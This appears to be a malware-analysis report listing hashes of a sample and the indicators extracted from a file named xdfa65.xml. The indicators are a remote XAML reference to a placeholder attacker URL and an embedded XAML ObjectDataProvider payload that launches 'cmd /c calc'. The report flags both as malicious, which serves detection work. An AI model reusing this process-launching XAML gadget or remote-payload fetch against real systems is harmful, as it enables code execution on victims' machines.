|
Hash | Hash Value |
|---|---|
| MD5 | 4bd09f2dc67e59f1c23938ba3e342a6f
|
| Sha1 | ca357880977bafc3b3d59d41d749cce33970821d
|
| Sha256 | 9c9fef1a647d1135a662baa47f09fccce751a37a55b0907983c4944704cbcd36
|
| Sha384 | 5e9a86b0658890d190cd784b776a9a87ac638fe488ce0447507ba18f7a59af900e08aeebedac58bcfcaf579fbb2ec37c
|
| Sha512 | 1e49f8f5875de8fb4d3f4a41670bf75c06167ddfa0c57a1b8242887d9bd26e7819b618fa38498cc8f805bc3ff8bad7141247f04736ac309b86c6f763fa1364fa
|
| SSDeep | 24:yr4+4hSP+y/3oCWXWpWFbnWqnWr3o0w4+Qs3:U+dy/3SG41WqWr3v2QO
|
| TLSH | 2E01BDE9469E6C10D8F999437AF0E407EC420147A6CAF294B4DC834F6F2D980A007AF3
|
|
Config. Field0 | Value |
|---|---|
| Command | cmd |
| Arguments | /c calc |
|
Name0 | Value |
|---|---|
| Remote XAML Reference | http://[attackersite]/payload.xaml |
| XAML Embedded ObjectDataProvider | <ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> |
|
Config. Field0 | Value |
|---|---|
| Command | cmd |
| Arguments | /c calc |
|
Name0 | Value | Location |
|---|---|---|
| Remote XAML Reference | http://[attackersite]/payload.xaml Malicious |
xdfa65.xml |
| XAML Embedded ObjectDataProvider | <ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> Malicious |
xdfa65.xml |